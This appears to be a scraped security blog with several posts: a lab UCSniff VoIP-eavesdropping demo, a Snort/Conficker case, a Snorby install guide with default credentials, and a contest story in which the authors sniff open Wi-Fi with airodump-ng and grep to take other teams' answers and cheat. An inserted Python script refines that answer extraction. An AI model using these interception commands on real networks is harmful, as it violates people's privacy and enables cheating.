<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhST2PKGHzYlswblWx7skahSvdq34JLV1G2hPgw4BxFD4lrPD9b0_QEISHmaWoqIArnsh4OFxuPW_yZxzfRvOYOWJ75TDqdFZmIElpIzaPkWEzdCUC3xaFfduNMOIEPr-BcU7h11NqbS8c/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhST2PKGHzYlswblWx7skahSvdq34JLV1G2hPgw4BxFD4lrPD9b0_QEISHmaWoqIArnsh4OFxuPW_yZxzfRvOYOWJ75TDqdFZmIElpIzaPkWEzdCUC3xaFfduNMOIEPr-BcU7h11NqbS8c/s320/0.png" width="278" /></span></a></div>
<div style="text-align: left;">
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: Xplico supported protocols state </span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">Today we will use <a href="http://ucsniff.sourceforge.net/index.html">UCSniff</a>, a tool that allows rapid testing for the threat of unauthorised VoIP and video eavesdropping. Some of its features:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Audio Eavesdropping</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Video Eavesdropping (creates H.264 format file)</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Realtime Audio Monitor</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- GUI Support</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Realtime Video Monitor</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Creates an avi file and muxes audio and video</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Creates a wav file and muxes both forward and reverse audio</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">For this POC (Proof of Concept) I will use two virtual machines: one with <a href="http://www.backtrack-linux.org/">BT</a> (BackTrack) 5 and <a href="http://www.zoiper.com/download_list.php">Zoiper Classic</a> as the client (I had problems running Ekiga on BT5), and another with Debian Squeeze and a basic <a href="http://www.asterisk.org/">Asterisk</a> installation. It is not a very realistic environment, but it is enough for this POC and it means we do not need to do <a href="http://en.wikipedia.org/wiki/Man-in-the-middle_attack">MitM</a> (Man in the Middle). I am sure that if you are reading this you know how to get into the traffic path with your favourite sniffer or with UCSniff itself ;).</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">OK, first we need to download the latest version of UCSniff (<a href="http://sourceforge.net/projects/ucsniff/files/ucsniff/ucsniff-3.1%20src/">here</a>) and install the dependencies to compile it on BT5 with the GUI (Graphical User Interface) and the realtime video monitor:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">apt-get install build-essential zlib1g-dev liblzo2-dev libpcap0.8-dev libnet1-dev libasound2-dev libbz2-dev libncurses5-dev</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">apt-get install libx11-dev libxext-dev libfreetype6-dev</span></i></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">NOTE: the VLC version and development libraries shipped with BT5 break the compilation, so first install them from the VLC repositories:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">add-apt-repository ppa:lucid-bleed/ppa</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">apt-get update</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">apt-get install vlc libvlc-dev</span></i></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">Now go into the unpacked UCSniff source folder and compile it:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">./configure --enable-libvlc --enable-gui</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">make</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">make install</span></i></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">We are ready to run it (graphical interface) for the first time:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">ucsniff -G</span></i><br />
<i><span class="Apple-style-span" style="color: #444444;"><br />
</span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbEXzu6RzUp3cJsuINYcp1zQqS4IprYK2gpGetdX_pIUGndBvTi__cmfL2hnob456GmAcwPoU8M8GTynqiiv6T2NhCh53_AoGvPwIsbSu0pM5EtPsR2pbMs6Hxo3iRs4hMkneT0hNDrPk/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbEXzu6RzUp3cJsuINYcp1zQqS4IprYK2gpGetdX_pIUGndBvTi__cmfL2hnob456GmAcwPoU8M8GTynqiiv6T2NhCh53_AoGvPwIsbSu0pM5EtPsR2pbMs6Hxo3iRs4hMkneT0hNDrPk/s320/1.png" width="320" /></span></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: UCSniff general view</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">Yes, it is not too sexy, above all those evil buttons! xD. For this test select <i>Monitor Mode</i> and <i>Start Sniffing</i> as in the picture and the sniffer will start capturing. The next step is making a call; I will call myself (yes, it is possible! you should try it :D).</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjecethOCkpVotsZH9qo-RmHHTNMaKS5tC645-qxP_IaMtbH6yQhvg5VS_9QdccHnf1p8JOtenexPvRtII5zoxFzDg1ZCMw5gIsCak56LCIkD5Yd-QdwSJ1wehgqyMhgdeJzxXiHA7SbRE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjecethOCkpVotsZH9qo-RmHHTNMaKS5tC645-qxP_IaMtbH6yQhvg5VS_9QdccHnf1p8JOtenexPvRtII5zoxFzDg1ZCMw5gIsCak56LCIkD5Yd-QdwSJ1wehgqyMhgdeJzxXiHA7SbRE/s320/2.png" width="320" /></span></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="color: #444444;">Figure: Calling myself</span></span></div>
<div style="text-align: center;">
</div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span><br />
<span class="Apple-style-span" style="color: #444444;">After accepting the incoming call, the <i>Output Console</i> logs it as in the next two pictures (the second was taken after hanging up from one side).</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwauLJk21lq1kmkeV5MwNdu4ivjdpXSE4G43tP83eGDuL_f-15SeR7s5N0ggLlQHcIqHgM67R_0tiPwMh1uG-OilOUvfAlzpaFSPyZXRav3fi0FpohlmJK2x5rYUzdB19WwbDEIngkfJw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwauLJk21lq1kmkeV5MwNdu4ivjdpXSE4G43tP83eGDuL_f-15SeR7s5N0ggLlQHcIqHgM67R_0tiPwMh1uG-OilOUvfAlzpaFSPyZXRav3fi0FpohlmJK2x5rYUzdB19WwbDEIngkfJw/s320/4.png" width="320" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxYiLT0aLR1akO9XLW2TQFGzE1DQVDb-v_ZtTQ5GZmGrS9798_bPHXq1lVnQFZYVeEIOZGSVGE9zipQoehX4gXJ5AFLkk4S5j-UwkfUwABbMw9AAFF_xNnXeWk0ztSYH_DDeWXIoghS4k/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxYiLT0aLR1akO9XLW2TQFGzE1DQVDb-v_ZtTQ5GZmGrS9798_bPHXq1lVnQFZYVeEIOZGSVGE9zipQoehX4gXJ5AFLkk4S5j-UwkfUwABbMw9AAFF_xNnXeWk0ztSYH_DDeWXIoghS4k/s320/5.png" width="320" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="color: #444444;">Figure: Logging calls</span></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">Well done! We can see that the conversation was captured. There are two calls instead of one because the virtual machine's interface is really mapped onto another one, but it works: one of the two .wav files will be empty and the other will contain the saved conversation. I think that is enough for the first day. In the next article we will review all the outputs produced by the sniffer and dig a bit deeper into this attack. In the meantime, I recommend visiting the tool's site, where you can learn more about it and see examples of using the GUI with MitM and video eavesdropping: <a href="http://ucsniff.sourceforge.net/guiusage.html">http://ucsniff.sourceforge.net/guiusage.html</a></span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ucsniff.sourceforge.net/images/screenshots/livemonitor1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="200" src="http://ucsniff.sourceforge.net/images/screenshots/livemonitor1.png" width="320" /></span></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: UCSniff Video Eavesdropping</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: right;">
<span class="Apple-style-span" style="color: #444444;">Jesús Pérez</span></div>
</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-60476128612788486962011-03-02T13:08:00.009+01:002012-02-11T18:16:13.015+01:00Why use an IDS? A real case with Snort<div>
<div>
<a href="http://nicerosniunos.blogspot.com/2011/01/snort-for-dummies-insta-snort.html">In an earlier article</a> I explained how to install an intrusion detection system (IDS) in a simple way, specifically <a href="http://www.snort.org/">Snort</a> with the <a href="http://snorby.org/">Snorby</a> interface. Today I want to show the power of this kind of application through an example I came across in my work as a consultant.<br />
To set the scene, imagine a small or medium-sized company with nobody in charge of systems, as many are in Spain. When you arrive it takes a while to understand how the whole system works (there is nobody to ask), and an IDS helps a lot with this task by detecting anomalies in the organisation's network traffic.<br />
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYmpypQhE79iGk2gTTxiYSQk9w3q7L_h0M-LUoXSMo1ENl_9kK-8JjQ8qe5_QFL_WaAnpTm95vFlGdGFzQ4vt-q41o_b9Zqh9ymGCbwaGx19C3eF5m_pERObHD7WfTPqMTFOo0g9bO5A/s1600/1.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579460944554265586" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYmpypQhE79iGk2gTTxiYSQk9w3q7L_h0M-LUoXSMo1ENl_9kK-8JjQ8qe5_QFL_WaAnpTm95vFlGdGFzQ4vt-q41o_b9Zqh9ymGCbwaGx19C3eF5m_pERObHD7WfTPqMTFOo0g9bO5A/s400/1.png" style="cursor: pointer; display: block; height: 387px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;" /></a></div>
<div>
<div style="text-align: center;">
<span class="Apple-style-span"><u><br /></u></span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYmpypQhE79iGk2gTTxiYSQk9w3q7L_h0M-LUoXSMo1ENl_9kK-8JjQ8qe5_QFL_WaAnpTm95vFlGdGFzQ4vt-q41o_b9Zqh9ymGCbwaGx19C3eF5m_pERObHD7WfTPqMTFOo0g9bO5A/s1600/1.png"></a><br />
In the first image (last-year view) you can see that at the beginning more than 70 events classified as high severity were detected, plus a great many low-severity ones; the medium-severity ones were caused by me testing with nmap. This led me to investigate a bit further, and it turned out that the antivirus was not scanning (or not scanning properly) a file type specific to one application, and that is where the infamous <a href="http://es.wikipedia.org/wiki/Conficker">Conficker</a> worm was hiding on some of the machines. The previous graph shows that once the worm was removed the alerts dropped drastically, down to the current situation in the next image (last-month view). <br />
NOTE: It is important to review the low-severity alerts too, even though they almost always turn out to be false positives.</div>
<div>
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoW5K1rHfnzw0OAXy5qzzyM8BYyBONORTysvrqd5eB8zzawd9Arf_F7bzKxijmkgYvTyXFVhyulPmXBP46YpkFLGy4rk_eLjYvVVzJQe3ra9rsvc08fFVk_e6USfOuGForgjJR0mgmdsc/s1600/2.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579461127813469218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoW5K1rHfnzw0OAXy5qzzyM8BYyBONORTysvrqd5eB8zzawd9Arf_F7bzKxijmkgYvTyXFVhyulPmXBP46YpkFLGy4rk_eLjYvVVzJQe3ra9rsvc08fFVk_e6USfOuGForgjJR0mgmdsc/s400/2.png" style="cursor: hand; cursor: pointer; display: block; height: 389px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />
<div>
<br />The point I want to highlight is that it helped us detect a problem we did not know existed, as it can with many others. Another advantage of using one is that it helps you learn a bit more about how the organisation's network works. :)<br />
<br />
<div style="text-align: right;">
Jesús Pérez</div>
</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-54362439593345147442011-02-28T13:19:00.027+01:002012-02-11T18:45:39.156+01:00Stealing from a thief ...: h4ckc0nt3st GSICUPDATE: I see on Twitter <a href="http://www.lucianobello.com.ar/post/how-to-hack-a-h4ckc0nt3st/">that we were not the only ones</a> :)<br />
<div>
On Thursday we arrived late at the <a href="http://www.fi.udc.es/">FIC</a>, saying it was surely too late to sign up for the <a href="http://www.gsicoruna.com/jornadas/">GSIC</a> h4ck0nt3st, but when we entered the room <a href="http://www.reversemode.com/">Rubén Santamarta</a> was just starting, and it is not every day you get to listen to someone who does "what he does", so we decided to postpone registration.<br />
When we finally got to play we saw that some teams already had 6 or 7 answers and, after solving the first challenges, which were easy, we realised there was no way to catch up with the leaders, so we went off for a relaxed lunch.<br />
On the way it occurred to us that by sniffing all the packets on the (open) wireless network we would be able to capture the other participants' answers, since the application used in the h4ckc0nt3st did not encrypt its traffic. We would save the answers and submit them little by little so it would not be too obvious.<br />
After lunch we went back to the faculty and we were in luck: people were fighting with the challenges:<br />
- First we put the card into monitor mode:<br />
<i>airmon-ng start wlan0</i><br />
- We captured everything on the h4ckc0nt3st channel and BSSID:<br />
<i>airodump-ng --bssid X --channel 13 -w capture mon0</i><br />
- Since we were in a hurry because <a href="http://twitter.com/#!/aramosf">Alejandro Ramos</a>'s workshop, which we recommend to everyone, was about to start, instead of using <i>Wireshark</i> we tried the <i>strings</i> command and a simple <i>grep</i>, and saw that this was going to work:<br />
<i>strings capture-01.cap | grep clave</i><br />
<i><br /></i></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0x_ERn4nY3Ze-DYI0MgW2r4ayFBoWc-Ele2epXio7zQUHyfcJHNnNnTvsQiQy6OTUnP4fsgqV9Z8PPkZp_KWZqVMuJcizg8v61T1cxybCZMRjarh-SdlaLrwIrmvOo8GpmVYfvJ85yK4/s1600/1.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5578866055094446562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0x_ERn4nY3Ze-DYI0MgW2r4ayFBoWc-Ele2epXio7zQUHyfcJHNnNnTvsQiQy6OTUnP4fsgqV9Z8PPkZp_KWZqVMuJcizg8v61T1cxybCZMRjarh-SdlaLrwIrmvOo8GpmVYfvJ85yK4/s400/1.png" style="cursor: pointer; display: block; height: 116px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;" /></a><br />
<div style="text-align: center;">
<br />
<div style="text-align: left;">
We ran into a few problems:</div>
</div>
- We were also getting the wrong answers, and trying them all would be very noisy, so we fixed it by refining the filter a bit: keep only the 500 lines around each "superado" (challenge passed) response and pick the <i>clave=</i> fields within that context:<br />
<i>strings capture-01.cap | grep -i -C500 superado | grep clave=</i><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW29OyyWpnm_vdNSdrYwaTN_9LxYj2ep-6pVxT1ZMSgYG5MorOSdL0rp1OMwIp3uGBTDBByC_mFH3pJxFI5HUgZ7sV3up1pCuzUbziKDFPK0x9ocVzDJU-Waeb4q8aCl1MS9ef_kjXO9w/s1600/2.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579026535303941682" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW29OyyWpnm_vdNSdrYwaTN_9LxYj2ep-6pVxT1ZMSgYG5MorOSdL0rp1OMwIp3uGBTDBByC_mFH3pJxFI5HUgZ7sV3up1pCuzUbziKDFPK0x9ocVzDJU-Waeb4q8aCl1MS9ef_kjXO9w/s400/2.png" style="cursor: hand; cursor: pointer; display: block; height: 29px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />
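<div style="text-align: left;">
The <i>grep -C500</i> pipeline above works by proximity: it keeps any <i>clave=</i> line that sits within 500 lines of a "superado" response. The following Python script is an added example written for this page, not part of the original post or of the contest application; it makes the pairing explicit by walking the <i>strings</i> output in order, remembering the last submitted answer and keeping it only when the response that follows it says "superado". The lines in <i>STRINGS_OUTPUT</i> are a constructed stand-in for the real output; the host, path, challenge ids and answers are invented.</div>

```python
"""Pair submitted contest answers with the responses that confirmed them.
Added example, not from the original post. STRINGS_OUTPUT is a constructed
stand-in for `strings capture-01.cap`: host, path, ids and answers invented."""
from urllib.parse import parse_qsl

STRINGS_OUTPUT = """\
POST /h4ckc0nt3st/responder.php HTTP/1.1
Host: 10.13.37.1
Content-Type: application/x-www-form-urlencoded
reto=3&clave=wrong_guess
HTTP/1.1 200 OK
Content-Type: text/html
Respuesta incorrecta, intentalo de nuevo
POST /h4ckc0nt3st/responder.php HTTP/1.1
Host: 10.13.37.1
reto=3&clave=s3cr3t%5F3
HTTP/1.1 200 OK
Content-Type: text/html
Enhorabuena, reto superado!
POST /h4ckc0nt3st/responder.php HTTP/1.1
reto=5&clave=another+one
HTTP/1.1 200 OK
Reto superado
""".splitlines()


def confirmed_answers(lines, success_marker="superado"):
    """Return {reto: clave} for answers the server acknowledged.

    The `grep -C500 superado | grep clave=` trick approximates this by
    proximity; walking the stream in order instead means a wrong guess that
    happens to sit near someone else's success is not picked up.
    """
    pending = None      # (reto, clave) of the last request still unanswered
    confirmed = {}      # reto -> first clave the server accepted
    for line in lines:
        if line.startswith(("POST ", "GET ")):
            pending = None          # new request: the previous one was never confirmed
        elif "clave=" in line:
            fields = dict(parse_qsl(line))   # also urldecodes %5F and '+'
            if "clave" in fields:
                pending = (fields.get("reto", "?"), fields["clave"])
        elif pending and success_marker in line.lower():
            confirmed.setdefault(*pending)
            pending = None
    return confirmed


if __name__ == "__main__":
    for reto, clave in sorted(confirmed_answers(STRINGS_OUTPUT).items()):
        print(f"reto {reto}: {clave}")
```

On a shared wireless channel several clients' requests interleave, so on a real capture the pairing should be keyed on the client IP or on the TCP stream (Wireshark's Follow TCP Stream does exactly that), information the <i>strings</i> output has already thrown away.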
On Friday morning a certificate was published to encrypt the application's traffic and the game was over for us. :(<br />
Although we did not manage to finish second, which was the goal, a bit of hacking is always fun, and even more so during these events. <br />
Thanks to the organisers for letting us spend a few days like this without leaving A Coruña; now we wait for <a href="http://www.rootedcon.es/">Rooted CON'2011</a>. :D<br />
<div style="text-align: right;">
Carlos López</div>
<div align="right">
Jesús Pérez</div>
<br />
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-22670294185127626532011-01-15T16:31:00.024+01:002012-02-11T18:16:49.150+01:00Snort "for dummies": Insta-Snort<div>
<div>
<span class="Apple-style-span"></span><br />
<div style="font-size: small;">
<div>
<span class="Apple-style-span" style="line-height: 16px;">Today I am going to talk about <a href="http://snorby.org/">Snorby</a>. I will not focus on <a href="http://es.wikipedia.org/wiki/Sistema_de_detecci%C3%B3n_de_intrusos">intrusion detection systems</a> (IDS) or on <a href="http://www.snort.org/">Snort</a>, because there is plenty of documentation about them. Snorby is a front end for the Snort IDS; its creators aim to build a highly competitive tool for network monitoring in both private and enterprise environments.</span></div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="line-height: 16px;">I had been following the project since its early versions, looking for something similar to <a href="http://activeworx.org/programs/idspm/index.htm">IDS Policy Manager</a> (Windows systems) for Linux environments. With the arrival of version 2.0 it seems, in my view, to be ready for use in production environments. Although for now it lacks many of IDS Policy Manager's features, it offers other <a href="http://snorby.org/why">advantages</a> and it is much prettier :). You can try a demo at: <a href="http://demo.snorby.org/users/login">http://demo.snorby.org/users/login</a></span></div>
<div>
<span class="Apple-style-span"><br /></span></div>
<div>
<span class="Apple-style-span" style="line-height: 16px;">NOTE: <i>demo@snorby.org/snorby</i></span></div>
</div>
<div style="font-size: small;">
<span class="Apple-style-span"><br /></span></div>
<span class="Apple-style-span"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ3M24l0lczDGI6XmkgSEz2e-bbvONxGig-1oEAu6Mk3Ore36cPQ6HvooZrDevAD_jxaGj8P2j4DsHmrDtruSbXeTQTS9KPKGi2Dlv0k6mAe9S0kWih8Gfg1DiTHGW3KvwCUG2F_VCcqg/s1600/1.png" style="font-size: small;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564013405210706002" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ3M24l0lczDGI6XmkgSEz2e-bbvONxGig-1oEAu6Mk3Ore36cPQ6HvooZrDevAD_jxaGj8P2j4DsHmrDtruSbXeTQTS9KPKGi2Dlv0k6mAe9S0kWih8Gfg1DiTHGW3KvwCUG2F_VCcqg/s320/1.png" style="cursor: pointer; display: block; height: 118px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br />
<div>
<div style="line-height: 16px; text-align: center;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div>
</div>
</div>
</span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTTkYlW221nBZU6uzAQhy8eVjARx9IemDKfj4KG6OYEG5ouLaeDnlCZ89skvsa5RgDmOGojrGMBjotoUxKKrnRYmldJYkRiD6gxMQqxjOjvWINOFDghxHkcQWLq4WFGe3zL4GXvAwqs0k/s1600/2.png"><span class="Apple-style-span"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564013654089601602" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTTkYlW221nBZU6uzAQhy8eVjARx9IemDKfj4KG6OYEG5ouLaeDnlCZ89skvsa5RgDmOGojrGMBjotoUxKKrnRYmldJYkRiD6gxMQqxjOjvWINOFDghxHkcQWLq4WFGe3zL4GXvAwqs0k/s320/2.png" style="cursor: pointer; display: block; height: 252px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></span></a><br />
<div>
<div style="text-align: center;">
<span class="Apple-style-span"><br /></span></div>
</div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br />
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span" style="line-height: 16px;">Of the installation options I prefer <a href="http://www.snorby.org/Insta-Snorby-0.5.iso">Insta-Snort</a> (the Insta-Snorby ISO), a distribution based on <a href="http://www.turnkeylinux.org/">TurnKey Linux</a> that is very easy to install and provides everything needed to get a Snort+<a href="http://www.securixlive.com/barnyard2/index.php">Barnyard2</a> system running with a very usable graphical interface. This way we can study the information the sensors provide in a comfortable and orderly way.</span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 16px;"><span class="Apple-style-span"><br /></span></span></span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span" style="line-height: 16px;">Installation is straightforward; the only remark is that it is advisable to get an Oink code in order to update the Snort rules (<a href="https://www.snort.org/signup">register</a>). Optionally, we can use the new feature that lets us analyse packet captures in .pcap format; for that we need to register with the <a href="http://www.openfpc.org/">OpenFPC</a> project. If we need Snort to listen on an interface other than eth0 we must follow <a href="https://github.com/Snorby/snorby/wiki/Change-Snort-Barnyard-interface-on-Insta-Snorby-0.5">this guide</a>.</span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span">To access the graphical interface we connect to the machine's web server and use the default administrator credentials; it is more than advisable to create another administrator and delete this one once logged in.</span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><br /></span></span></span></div>
<div style="font-size: small; line-height: normal;">
<span class="Apple-style-span">NOTE: <i>snorby@snorby.org</i>/<i>snorby</i></span></div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span></span></span></span></span></span><br />
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span" style="font-size: small;">Done: in a few steps we can enjoy our IDS. The image shows several alerts because it was taken a few days after the installation. To check that it works we will run a port scan with nmap and see whether it gets detected. This time I will make it easy; on other occasions I will run more complex tests to see how it responds.</span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><i><br /></i></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"></span><span class="Apple-style-span" style="font-size: small;"><i>nmap -F 192.168.0.X</i></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><i><br /></i></span></span></span></span></span></span></span></span></span></div>
</div>
</div>
</div>
